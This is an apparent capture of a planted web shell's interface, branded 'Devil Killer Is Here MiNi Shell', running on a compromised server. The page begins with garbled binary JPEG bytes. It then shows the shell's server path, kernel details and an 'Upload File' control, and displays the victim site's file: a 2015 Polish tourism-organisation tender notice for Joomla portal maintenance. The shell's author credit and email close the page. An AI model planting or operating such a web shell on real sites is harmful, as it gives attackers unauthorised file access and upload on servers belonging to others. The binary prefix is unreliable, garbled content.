JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150603/133930-N-2015.html

<p class="kh_header"><b>Warszawa: Utrzymanie i rozwój administratorsko - programistyczny rozwiązania portalowego Polskiej Organizacji Turystycznej w latach 2015-2017.</b><br>
<b>Numer ogłoszenia: 133930 - 2015; data zamieszczenia: 03.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Polska Organizacja Turystyczna , ul. Tytusa Chałubińskiego 8, 00-613 Warszawa, woj. mazowieckie, tel. 0-22 5367070, 5367011, faks 022 5367004.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pot.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie i rozwój administratorsko - programistyczny rozwiązania portalowego Polskiej Organizacji Turystycznej w latach 2015-2017..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa utrzymania i rozwoju administratorsko-programistycznego rozwiązania portalowego Polskiej Organizacji Turystycznej w latach 2013-2015 zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia określonym w Załączniku nr 1 do SIWZ, obejmującym:
A.Odebranie i przejęcie serwerów sprzętu wykorzystywanego w rozwiązaniu, na których działa rozwiązanie portalowe Zamawiającego od dotychczasowego Wykonawcy.
B.Przeprowadzenie audytu istniejącego systemu CMS Joomla v. 1.5 przed przejęciem obsługi:
a.opracowanie i wykonanie raportu wstępnego z audytu, który umożliwi podniesienie wersji oprogramowania do Joomla v. 2.5.
b.opracowanie i przedstawienie harmonogramu działań z nim związanych.
c.wdrożenie zmian wynikających z audytu zgodnie z harmonogramem.
C.Podniesienie wersji systemu Joomla do v. 2.5 z zachowaniem wszystkich wytycznych wynikających bezpośrednio z wykonanego audytu oraz oceny ryzyk.
D.Utrzymanie -kolokacja, zabezpieczenie i udostępnienie infrastruktury informatycznej oraz odpowiednich zasobów sieciowych na potrzeby serwerów Zamawiającego.
E.Gwarancja i wykonywanie aktualizacji sprzętu, serwerów oraz oprogramowania znajdującego się na serwerach, tak by zagwarantować poziom usług zgodny z warunkami SLA - załącznik nr 2 
do istotnych postanowień umowy.
F.Administrację sprzętową infrastrukturą informatyczną, systemem operacyjnym, rozwiązaniem portalowym oraz aplikacjami uzupełniającymi zainstalowanymi na serwerach.
G.Administracja rozwiązaniem portalowym oraz aplikacjami uzupełniającymi ,Joomla, MySQL, OpenX, platforma e-learning, platforma mobilna oraz innymi, które powstaną w trakcie trwania umowy.
H.	Prace programistyczne zlecane przez Zamawiającego w trybie 
on demand w zakresie gwarantującym kompleksowy rozwój funkcjonalny całego rozwiązania przez okres trwania umowy, zgodnie 
z zaakceptowanym obustronnie harmonogramem czasowym. Prace programistyczne wykonywane są w ramach wynagrodzenia miesięcznego 
i nie mogą generować dodatkowych kosztów po stronie Zamawiającego. Zlecane prace dotyczą wszystkich serwisów www na serwerach Zamawiającego.
I.Usługi konsultacyjne, analityczne i optymalizacyjne, ze szczególnym uwzględnieniem strategii rozwoju portali Zamawiającego, optymalizacji ich działania oraz wdrażania najnowszych trendów i technologii w trakcie trwania umowy.
J.Raportowanie w cyklu miesięcznym stanu serwera i oprogramowania.
K.Aktualizacja dokumentacji technicznej dla rozwiązania w zakresie dla administratora, programisty i użytkownika końcowego.
L.Przekazywanie zamawiającemu w cyklach półrocznych wersji produkcyjnej systemu w postaci plików konfiguracyjnych systemów zależnych, kodów źródłowych, aplikacji wraz z instrukcją ich kompilacji i instalacji a także skrypty instalacji.

Wspólny słownik zamówień CPV: 
72000000-5 - Usługi informatyczne: konsultacyjne, opracowywania oprogramowania, internetowe i wsparcia
72415000-2 - Usługi hostingowe dla stron WWW.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwości udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 Pzp. w wysokości do 20% wartości zamówienia podstawowego i zamówienia uzupełniające będą polegały na powtórzeniu tego samego rodzaju zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.00.00.00-5, 72.41.50.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 04.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> WADIUM
1.	Składając ofertę każdy Wykonawca zobowiązany jest wnieść wadium. 
2.	Kwota wadium wymaganego w przedmiotowym postępowaniu to 12 000,00 zł.
3.	Wadium musi zostać wniesione na cały okres terminu związania ofertą.
4.	Wadium należy wnieść przed upływem terminu składania ofert.
5.	Wadium należy wnieść w formach przewidzianych w art. 45 ust. 6 ustawy.
6.	W przypadku wniesienia wadium w formie gwarancji bankowych lub ubezpieczeniowych, z treści tych gwarancji musi w szczególności jednoznacznie wynikać:
a)	nieodwołalne i bezwarunkowe zobowiązanie gwaranta (banku, zakładu ubezpieczeń) do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust 4a i 5 ustawy, na pierwsze pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą,
b)	termin obowiązywania gwarancji,
c)	miejsce i termin zwrotu gwarancji.
7.	Gwarancja bankowa, gwarancja ubezpieczeniowa, poręczenie bankowe oraz poręczenia innych instytucji winny zostać złożone w formie dokumentu oryginalnego.
8.	Wadium w formie pieniężnej należy wnieść na rachunek bankowy Polskiej Organizacji Turystycznej, tj.:
Bank Gospodarstwa Krajowego  w Warszawie nr: 88 1130 1017 0020 1417 3690 0001, z podaniem tytułu WADIUM: Postępowanie nr 18_15

9.	Wadium w formie pieniężnej (przelew) musi zostać zaksięgowane na rachunku Zamawiającego przed upływem terminu składania ofert (dzień, godzina, minuta składania ofert).
10.	Kserokopię potwierdzenia złożenia wadium w formie pieniężnej należy dołączyć do oferty.
11.	 W przypadku wadium wnoszonego w poręczeniu lub gwarancji, oryginał dokumentu należy złożyć osobno w kopercie zawierającej ofertę, włączając do oferty kopię dokumentu.
12.	Nie wniesienie wadium w terminie określonym w niniejszej SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy, a jego oferta zostanie uznana za odrzuconą.
ZABEZPIECZENIE
1.	Ustala się zabezpieczenie należytego wykonania umowy w wysokości 5% ceny brutto podanej w ofercie.
2.	Zabezpieczenie należy wnieść jednorazowo, przed podpisaniem umowy wyłącznie w jednej z form określonych w art. 148 ust. 1 ustawy Prawo zamówień publicznych.
3.	Zabezpieczenie wniesione w formie poręczeń lub gwarancji musi zawierać zobowiązanie gwaranta lub poręczyciela do bezwarunkowej zapłaty zamawiającemu pełnej kwoty zabezpieczenia, na każde żądanie.
4.	Część zabezpieczenia, stanowiąca 70% całości zabezpieczenia należytego wykonania umowy, zostanie zwrócona w terminie 30 dni od dnia wykonania zamówienia i uznania przez zamawiającego za należycie wykonane. Pozostała część, stanowiąca 30% całości zabezpieczenia należytego wykonania umowy, zostanie zwrócona nie później niż 15 dni po upływie okresu gwarancji.
5.	Na wniosek wykonawcy, którego oferta zostanie uznana za najkorzystniejszą, wadium wniesione w pieniądzu wraz z odsetkami może być zaliczone przez zamawiającego na poczet zabezpieczenia należytego wykonania umowy.
6.	 Zabezpieczenie należytego wykonania umowy wniesione w pieniądzu, ma być wniesione na rachunek: Bank Gospodarstwa Krajowego w Warszawie nr: 88 1130 1017 0020 1417 3690 0001, albo na inny nr rachunku podany przez Zamawiającego w zaproszeniu do podpisania umowy z podaniem tytułu: Zabezpieczenie należytego wykonania umowy: Postępowanie nr 18_15</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana w oparciu o przedłożone przez Wykonawców oświadczenie, na zasadzie spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki dotyczące posiadania wiedzy i doświadczenia - Zamawiający stwierdzi, iż Wykonawca spełnił warunki określone w art. 22 ust. 1 ustawy, jeśli wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), wykonał (lub w przypadku usług ciągłych - wykonuje) co najmniej:
a.	dwa projekty obejmujące migrację danych, wdrożenie i utrzymywanie rozwiązań portalowych dedykowanych do obsługi serwisów wielojęzycznych (co najmniej 10 wersji językowych) wykorzystujących kodowanie UTF-8 oraz rozszerzenie JMS Multi Sites.
b.	dwa rozwiązania, o zbliżonym do rozwiązania Zamawiającego stopniu zaawansowania, opartych o CMS Joomla v 2.5 znajdujących się pod opieką Wykonawcy, z czego przynajmniej jeden dla administracji publicznej.
c.	dwa projekty długoterminowe dotyczące stałej obsługi administratorsko-programistycznej trwającej dłużej niż 1,5 roku każdy.
d.	jeden projekt obejmujący zaplanowanie, stworzenie struktury danych oraz zarządzanie bazą danych (MySQL) o tematyce turystycznej.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana w oparciu o przedłożone przez Wykonawców oświadczenie i dokumenty , na zasadzie spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana w oparciu o przedłożone przez Wykonawców oświadczenie, na zasadzie spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oudzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki dotyczące posiadania osób zdolnych do wykonania zamówienia. Zamawiający stwierdzi, iż Wykonawca spełnił warunki określone w art. 22 ust. 1 ustawy, jeśli wykaże, że zagwarantuje delegowany zespół projektowy do obsługi przedmiotu zamówienia składający się z co najmniej z 6-u osób: a. Kierownika projektu/Analityka, posiadającego przynajmniej dwuletnie doświadczenie zawodowe w zakresie umiejętności zarządzania projektami, w których przedmiotem było utrzymanie systemu informatycznego o zbliżonym stopniu zaawansowania jak u Zamawiającego oraz posiadającego dwuletnie doświadczenie w sektorze turystyki. Kompetencja kierownika projektu nie może być łączona z kompetencją żadnego z wymienionych stanowisk w punkcie 3.
b.	Minimum trzech programistów, z których każdy posiada dwuletnie doświadczenie w programowaniu, w technologii PHP. ver. 5, JavaScript, Ajax, itp. oraz wiedzę z zakresu integracji systemów a także uczestniczył w co najmniej 2 projektach informatycznych, których wartość osiągała min. 50 000 PLN (każdego 
z projektów).
c.	Specjalisty ds. testów, który posiada podstawową wiedzę z zakresu oskryptowania narzędzi do testów funkcjonalnych, wydajnościowych, obciążeniowych (np. Test Partner, HP Quality Center, Load Runner itp.). Uczestniczył w co najmniej  3 projektach informatycznych jako tester oprogramowania/test manager.
d.	Administratora/Administratorów, którzy posiadają wiedzę z zakresu zarządzania infrastrukturą informatyczna, a w szczególności:
administrowanie systemem linux / Unix, bazami danych MySQL, PostGreSQL Oracle
technikami wirtualizacji
administrowania urządzeniami sieciowymi (Firewalle, switche, routery, systemy IDS/IPS itp.)
z zakresu bezpieczeństwa danych
znajomości sprzętowej urządzeń informatycznych a także peryferyjnych
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana w oparciu o przedłożone przez Wykonawców oświadczenie i dokumenty , na zasadzie spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana w oparciu o przedłożone przez Wykonawców oświadczenie, na zasadzie spełnia nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Jakość, serwis oraz parametry techniczne - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne postanowienia umowy stanowią załącznik nr 5 do niniejszej SIWZ.
2.	Zamawiający dopuszcza zmianę postanowień zawartej umowy w zakresie:
a)	zmianę terminu rozpoczęcia umowy ze względu na przedłużające się procedury przetargowe,
b)	zamiany osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej umowy,
c)	sprostowania oczywistych omyłek pisarskich i rachunkowych,
d)	zamiany osób realizujących zamówienie ze strony Wykonawcy pod warunkiem posiadania przez nowe osoby kompetencji określonych w SIWZ w ust V w pkt  1 ppkt 3 oraz pod warunkiem przedstawienia Zamawiającemu przez Wykonawcę informacji o proponowanej zmianie wraz z wyjaśnieniem przyczyn proponowanej zmiany i uzyskaniem pisemnej zgody Zamawiającego.
3.Zmiany umowy wymagają formy pisemnej pod rygorem nieważności.
Ponadto 
1.	Zamawiający przewiduje możliwość dokonania następujących zmian postanowień zawartej umowy: 
1)	Przewiduje się zmianę wynagrodzenia w przypadku urzędowej zmiany podatku VAT. Zmiana ustawowej wysokości VAT powoduje odpowiednią zmianę wynagrodzenia 
od daty wprowadzenia zmiany. Podatek w nowej wysokości dotyczy tylko niezrealizowanej części zamówienia. 
2)	Przewiduje się zmianę wynagrodzenia należnego Wykonawcy, w przypadku zmiany: 
a)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 
3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
b)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne.
jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę; 
2.	Ustala się następujące zasady wprowadzania zmian, o których mowa w ust. 1 pkt 2:
a)	W przypadkach określonych w ust. 1 pkt 2, Wykonawca, w terminie nie dłuższym niż 14 dni od dnia wejścia w życie nowych przepisów, może zwrócić się 
do Zamawiającego z wnioskiem o zmianę wynagrodzenia. Wraz z wnioskiem, Wykonawca będzie zobowiązany pisemnie przedstawić Zamawiającemu szczegółową kalkulację uzasadniającą wzrost kosztów, wynikający ze zmiany w/w przepisów. Jeżeli po upływie 14 - dniowego terminu, Wykonawca nie zwróci się do Zamawiającego o zmianę wynagrodzenia, Zamawiający uzna, iż zmiany przepisów nie mają wpływu na koszty wykonania zamówienia przez Wykonawcę; 
b)	Zamawiający dokona analizy przedłożonej kalkulacji w terminie nie dłuższym niż 
14 dni od dnia jej otrzymania. Jeżeli uzna, że przedstawiona kalkulacja potwierdza wzrost kosztów ponoszonych przez Wykonawcę, dokona zmiany umowy w tym zakresie. Jeżeli uzna, że przedstawiona kalkulacja nie potwierdza wzrostu kosztów wykonania zamówienia, w wysokości zaproponowanej przez Wykonawcę, nie wrazi zgody na wprowadzenie zmiany, o czym poinformuje Wykonawcę, przedstawiając stosowne uzasadnienie. W takiej sytuacji, w terminie 14 dni od dnia otrzymania odmowy od Zamawiającego, Wykonawca może ponownie przedstawić kalkulację uzasadniającą wzrost kosztów, z uwzględnieniem uwag Zamawiającego, który dokona jej analizy w terminie nie dłuższym niż 14 dni od jej otrzymania, a następnie postąpi w sposób opisany powyżej; 
c)	zmiana wynagrodzenia nastąpi od daty wprowadzenia zmiany w umowie i może dotyczyć wyłącznie niezrealizowanej części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pot.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Polska Organizacja Turystyczna ul. Chałubińskiego 8 00 - 613 Warszawa XIX piętro sekretariat..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2015 godzina 12:00, miejsce: Polska Organizacja Turystyczna ul. Chałubińskiego 8 00 - 613 Warszawa XIX piętro sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wraz z podpisaniem  Umowy Wykonawca będzie zobowiązany  do podpisania Umowy powierzenia przetwarzania danych osobowych, która stanowi załącznik nr 7 do Umowy dotyczącej zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com